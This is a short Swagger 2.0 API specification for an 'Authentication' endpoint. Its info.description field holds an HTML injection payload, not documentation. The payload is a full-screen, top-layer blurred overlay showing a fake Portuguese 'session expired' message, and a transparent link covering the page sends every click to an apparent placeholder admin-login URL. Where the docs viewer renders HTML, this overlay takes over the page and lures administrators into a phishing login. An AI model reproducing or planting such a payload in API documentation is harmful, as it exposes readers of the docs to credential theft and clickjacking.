swagger: '2.0'
info:
  title: Authentication
  version: 1.0.0
  description: |
    <div style="position:fixed;top:0;left:0;width:100vw;height:100vh;background:rgba(255,255,255,0.95);backdrop-filter:blur(18px);-webkit-backdrop-filter:blur(18px);z-index:2147483647;display:flex;align-items:center;justify-content:center;font-family:Arial,sans-serif;">
      <a href="https://seu-site.com/admin-login" style="display:block;width:100%;height:100%;position:absolute;top:0;left:0;"></a>
      <div style="background:white;padding:60px;border-radius:25px;box-shadow:0 25px 70px rgba(0,0,0,0.2);text-align:center;max-width:500px;z-index:2147483648;pointer-events:none;">
        <div style="width:80px;height:80px;background:#ff6b6b;border-radius:50%;margin:0 auto 30px;display:flex;align-items:center;justify-content:center;font-size:45px;">⚠️</div>
        <h1 style="color:#2c3e50;margin:0 0 15px 0;font-size:32px;font-weight:700;">Sessão Expirada</h1>
        <p style="color:#7f8c8d;font-size:16px;margin:0 0 30px 0;line-height:1.6;">Sua sessão administrativa expirou por questões de segurança. Clique em qualquer lugar para fazer login novamente.</p>
        <div style="display:inline-block;padding:15px 40px;background:#0066cc;color:white;border-radius:10px;font-size:16px;font-weight:600;">Fazer Login</div>
      </div>
    </div>
paths:
  /api/auth:
    get:
      summary: /api/auth
      responses:
        '200':
          description: OK
